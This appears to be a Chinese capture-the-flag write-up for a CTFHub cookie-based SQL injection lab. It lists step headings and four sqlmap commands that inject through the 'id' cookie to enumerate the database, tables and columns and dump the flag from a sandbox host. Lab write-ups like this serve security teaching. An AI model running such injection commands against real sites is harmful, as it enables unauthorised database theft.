打开靶机

ctfhub技能树—sql注入—Cookie注入

查看页面信息

ctfhub技能树—sql注入—Cookie注入

查找cookie

ctfhub技能树—sql注入—Cookie注入

测试是否为cookie注入

ctfhub技能树—sql注入—Cookie注入
ctfhub技能树—sql注入—Cookie注入

抓包

ctfhub技能树—sql注入—Cookie注入

尝试注入

成功查询到数据库名

ctfhub技能树—sql注入—Cookie注入

查询表名

ctfhub技能树—sql注入—Cookie注入

查询字段名

ctfhub技能树—sql注入—Cookie注入

查询字段信息

ctfhub技能树—sql注入—Cookie注入

成功拿到flag

sqlmap

查询数据库名

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 --dbs

ctfhub技能树—sql注入—Cookie注入

查询数据表名

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli --tables

ctfhub技能树—sql注入—Cookie注入

查询字段名

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy --columns

ctfhub技能树—sql注入—Cookie注入

查询字段信息

python2 sqlmap.py -u "http://challenge-e27e712ceeb91bac.sandbox.ctfhub.com:10080/" --cookie "id=1" --level 2 -D sqli -T mwlhneimpy -C pbsbpdhlmf --dump

ctfhub技能树—sql注入—Cookie注入
成功拿到flag

相关文章:

  • 2022-12-23
  • 2021-04-10
  • 2022-12-23
  • 2022-12-23
  • 2021-12-27
  • 2021-06-15
  • 2021-06-08
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-07-30
  • 2021-08-08
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案